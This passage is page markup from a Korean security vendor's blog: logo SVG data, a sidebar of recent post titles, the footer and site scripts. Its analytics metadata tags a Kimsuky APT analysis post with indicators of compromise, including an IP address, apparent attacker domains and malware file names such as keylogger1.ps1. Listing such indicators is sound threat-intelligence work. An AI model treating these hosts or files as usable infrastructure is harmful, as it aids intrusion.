99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">[이스트소프트x이스트시큐리티] ‘파트너 킥오프 2025’ 성료 소식!</strong> <p class="txt_category">이스트시큐리티 소식</p> </div> </a> </li> <li> <a href="/5524" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FblZW5N%2FbtsMkKEkvTj%2FQrqXGBOv0w3DnERjqRaZ51%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">텔레그램 계정을 노리는 스미싱 주의!</strong> <p class="txt_category">악성코드 분석 리포트</p> </div> </a> </li> <li> <a href="/5529" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fecs5nI%2FbtsMkKceGaz%2Fty5ldD00p5ZfpdplTO8Hkk%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">이스트시큐리티 보안툰 #24|AI로 Chill해진 보안러 주목! LLM의 두 얼굴</strong> <p class="txt_category">안전한 PC&모바일 세상/보안툰</p> </div> </a> </li> <li> <a href="/5528" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7oZtO%2FbtsMiF2jJ98%2FkoSk7KywKxx7D8amNZQ5UK%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">[무엇이든 물어보안] ① 간편 로그인, 정말 안전할까?</strong> <p class="txt_category">이스트시큐리티 소식</p> </div> </a> </li> </ol> </div> <!-- 최신글 --> </div> <!-- // sidebar --> </div> <!-- // sub page // .wrap_detail_content --> <div class="wrap_content"> <div class="content"> <div class="section_btm_area"> <!-- 태그 magz 디자인 --> <!-- //태그 magz 디자인 --> <!-- log magz 디자인 --> <!-- // log magz 디자인 --> </div> </div> </div> <!-- sub page --> <div id="footer" class="footer"> <div class="inner_footer"> <div class="area_select"> <div class="box_select"> <div class="inner_box"> <select class="opt_select"> <option>패밀리사이트</option> </select> </div> </div> </div> <div class="area_address"> <ul class="flnb"> <li><a href="/notice/5" target="_blank">운영정책</a></li> <li><a href="http://advert.estsoft.com/?event=201706078203578" target="_blank">이스트시큐리티 홈페이지</a></li> <li><a href="http://advert.estsoft.com/?event=201401281593438" target="_blank">이스트시큐리티 페이스북</a></li> </ul> <div class="location"> <a href="http://advert.estsoft.com/?event=201706078203578" target="_blank">(주)이스트시큐리티</a> 서울시 서초구 반포대로 3 이스트빌딩 (우) 06711 대표이사:정진일 사업자등록번호 548-86-00471 통신판매업신고번호 : 제2017-서울서초-0134호 </div> <div class="info_link"> </div> <address class="box_address"> <span class="txt_flogo">이스트시큐리티 알약 블로그</span> <span class="txt_address">Ⓒ ESTsecurity, ALL RIGHTS RESERVED.</span> </address> <div class="area_sns"> </div> <div class="select_box btn_wrap"> <span class="s_default">패밀리 사이트</span> <ul> <li><a href="http://advert.estsoft.com/?event=201706078203578" target="_blank">이스트시큐리티 홈페이지</a></li> <li><a href="http://advert.estsoft.com/?event=201401281593438" target="_blank">이스트시큐리티 페이스북</a></li> <li><a href="http://advert.estsoft.com/?event=201706071217726" target="_blank">이스트시큐리티 트위터</a></li> <li><a href="http://advert.estsoft.com/?event=201706121032868" target="_blank">이스트소프트 홈페이지</a></li> </ul> <i>▲</i> </div> </div> </div> <!-- inner_footer --> </div> <!-- footer close --> </div> <!-- container close --> </div> <script> $("img[alt='N']").each(function(){ $(this).replaceWith('<img src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/ico_new_green.png">'); }); $(".link_thumb .cont_thumb .txt_thumb img").each(function(){ $(this).replaceWith('<img src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/ico_new_green.png">'); }); var $gnbList = $(".header .category_list").find(">li"); $gnbList.eq(5).hide(); $gnbList.eq(6).hide(); function nav() { $(".footer .select_box").each(function(i) { $(this).find("span").click(function(e) { e.preventDefault(); $(".select_box:not(:eq(" + i + "))").removeClass("on"); $(this).parent("div").toggleClass("on"); }) }); } nav(); function removeComma() { var str=$(".tag_cont").get()[0].innerHTML.split(","); var text=""; for(var i=0; i<str.length; i++){ text+=str[i]; } $(".tag_cont").text(""); $(".tag_cont").append(text); } if( $(".tag_cont").length > 0 ) removeComma(); </script> <div class="#menubar menu_toolbar "> <h2 class="screen_out">티스토리툴바</h2> </div> <div class="#menubar menu_toolbar "></div> <div class="layer_tooltip"> <div class="inner_layer_tooltip"> <p class="desc_g"></p> </div> </div> <div id="editEntry" style="position:absolute;width:1px;height:1px;left:-100px;top:-100px"></div> <!-- CallBack - START --> <script> (function () { var blogTitle = '이스트시큐리티 알약 블로그'; (function () { function isShortContents () { return window.getSelection().toString().length < 30; } function isCommentLink (elementID) { return elementID === 'commentLinkClipboardInput' } function copyWithSource (event) { if (isShortContents() || isCommentLink(event.target.id)) { return; } var range = window.getSelection().getRangeAt(0); var contents = range.cloneContents(); var temp = document.createElement('div'); temp.appendChild(contents); var url = document.location.href; var decodedUrl = decodeURI(url); var postfix = ' [' + blogTitle + ':티스토리]'; event.clipboardData.setData('text/plain', temp.innerText + '\n출처: ' + decodedUrl + postfix); event.clipboardData.setData('text/html', '<pre data-ke-type="codeblock">' + temp.innerHTML + '</pre>' + '출처: <a href="' + url + '">' + decodedUrl + '</a>' + postfix); event.preventDefault(); } document.addEventListener('copy', copyWithSource); })() })()</script> <!-- CallBack - END --> <!-- DragSearchHandler - START --> <script src="//search1.daumcdn.net/search/statics/common/js/g/search_dragselection.min.js"></script> <!-- DragSearchHandler - END --> <div style="margin:0; padding:0; border:none; background:none; float:none; clear:none; z-index:0"></div> <script type="text/javascript" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/script/common.js"></script> <script type="text/javascript">window.roosevelt_params_queue = window.roosevelt_params_queue || [{channel_id: 'dk', channel_label: '{tistory}'}]</script> <script type="text/javascript" src="//t1.daumcdn.net/midas/rt/dk_bt/roosevelt_dk_bt.js" async="async"></script> <script>window.tiara = {"svcDomain":"user.tistory.com","section":"글뷰","trackPage":"글뷰_보기","page":"글뷰","key":"1638807-2299","customProps":{"userId":"0","blogId":"1638807","entryId":"2299","role":"guest","trackPage":"글뷰_보기","filterTarget":false},"entry":{"entryId":"2299","entryTitle":"암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2","entryType":"POST","categoryName":"악성코드 분석 리포트","categoryId":"957259","serviceCategoryName":"IT 인터넷","serviceCategoryId":401,"author":"1225176","authorNickname":"알약(Alyac)","blogNmae":"이스트시큐리티 알약 블로그","image":"cfile6.uf@99122D365CD9FCC925C076.jpg","plink":"/2299","tags":["173.248.170.149","a2khs.mireene.co.kr","bit-albania.com","cow.gif","EGIS","exe.gif","expres.php","first.hta","keylogger1.ps1","Kimsuky","windowsmb","스모크 스크린","쓰렛 인사이드(Threat Inside)","안보정세-북·러 정상회담 결과보고.hwp"]},"kakaoAppKey":"3e6ddd834b023f24221217e370daed18","appUserId":"null"}</script> <script type="module" src="https://t1.daumcdn.net/tistory_admin/frontend/tiara/v1.0.5/index.js"></script> <script src="https://t1.daumcdn.net/tistory_admin/frontend/tiara/v1.0.5/polyfills-legacy.js" nomodule="true" defer="true"></script> <script src="https://t1.daumcdn.net/tistory_admin/frontend/tiara/v1.0.5/index-legacy.js" nomodule="true" defer="true"></script> </body> </html>